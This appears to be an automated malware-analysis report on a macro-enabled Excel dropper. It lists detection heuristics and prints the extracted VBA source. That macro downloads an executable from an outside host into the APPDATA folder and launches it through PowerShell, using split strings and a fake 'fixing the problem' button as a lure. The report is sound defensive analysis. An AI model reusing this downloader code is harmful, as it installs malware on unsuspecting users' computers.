MALICIOUS
330
Risk Score
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set objWshell1 = CreateObject("WScript.Shell") -
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare Function URLDownloadToFile Lib "urlmon" _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set objWshell1 = CreateObject("WScript.Shell") -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
TrustedPath = Environ("APPDATA") + "\Microsoft\Templates\" -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://pttgcgroup.co/down/diskmon64.exe Referenced by macro
- https://pttgcgroup.co/down/diskmon32.exeReferenced by macro
- http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
- http://ns.adobe.com/exif/1.0/Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1945 bytes |
SHA-256: 245663724bcf036ce4a1ffab5a0b98c9b3d587b5168288644965ddc09cffe6b4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
ByVal szURL As String, ByVal szFileName As String, _
ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Sub Calculate_Score()
Dim TrustedPath As String
TrustedPath = Environ("APPDATA") + "\Microsoft\Templates\"
Dim DlFile As String
DlFile = "ximplant.exe"
Dim DestImplant As String
#If Win64 Then
DestImplant = "https://pttgcgroup.co/down/diskmon64.exe"
#Else
DestImplant = "https://pttgcgroup.co/down/diskmon32.exe"
#End If
Dim ret As Long
ret = URLDownloadToFile(0, DestImplant, TrustedPath + DlFile, 0, 0)
If ret <> 0 Then MsgBox "Please try again!", vbInformation
Dim objWshell1 As Object
Set objWshell1 = CreateObject("WScript.Shell")
Dim t1, t2, t3, t4, t5 As String
t1 = "pow"
t2 = "ersh"
t3 = "ell.e"
t4 = "xe -nop"
t5 = " -Command "
objWshell1.Exec (t1 + t2 + t3 + t4 + t5 + TrustedPath + DlFile)
End Sub
Sub Button4_Click()
MsgBox "It will take 2-3 minutes to resolve the issue, please wait."
Call Calculate_Score
Application.Wait (Now + TimeValue("0:00:10"))
MsgBox "The problem has been resolved."
End Sub
Attribute VB_Name = "Module2"
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 17920 bytes |
SHA-256: 6c369fb2d5fc223398ae24beefc9554db3ac8a19534c04e04f5d816ebea983c0 |
|||
|
Detection
ClamAV:
Doc.Dropper.Agent-6412232-1
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.